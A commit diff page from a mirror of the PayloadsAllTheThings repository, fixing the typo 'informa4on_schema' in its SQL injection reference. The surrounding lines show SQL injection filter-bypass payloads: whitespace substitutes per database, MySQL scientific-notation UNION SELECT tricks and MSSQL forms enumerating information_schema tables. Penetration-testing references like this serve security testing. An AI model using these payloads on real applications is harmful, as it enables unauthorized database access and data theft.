1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-13 11:36:06 +02:00

informa4on_schema => information_schema

(Copy-paste error)
This commit is contained in:
Philippe Arteau 2021-10-31 23:33:58 -04:00 committed by GitHub
parent 6c5e790234
commit 4169e5d603
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -454,7 +454,7 @@ No Whitespace - bypass using parenthesis
```
Whitespace alternatives by DBMS
| DBMS | ASCII Characters in hexadicimal |
| DBMS | ASCII characters in hexadicimal |
| ---- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
@ -523,8 +523,8 @@ SELECT\N/0.e3UNION SELECT 2
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS
SELECT informa4on_schema 1337.e.tables 13.37e.table_name
SELECT 1 from informa4on_schema 9.e.table_name
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name
```
MSSQL
@ -537,7 +537,7 @@ SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[informa4on_schema].[tables]
SELECT"table_name"FROM[information_schema].[tables]
```
Oracle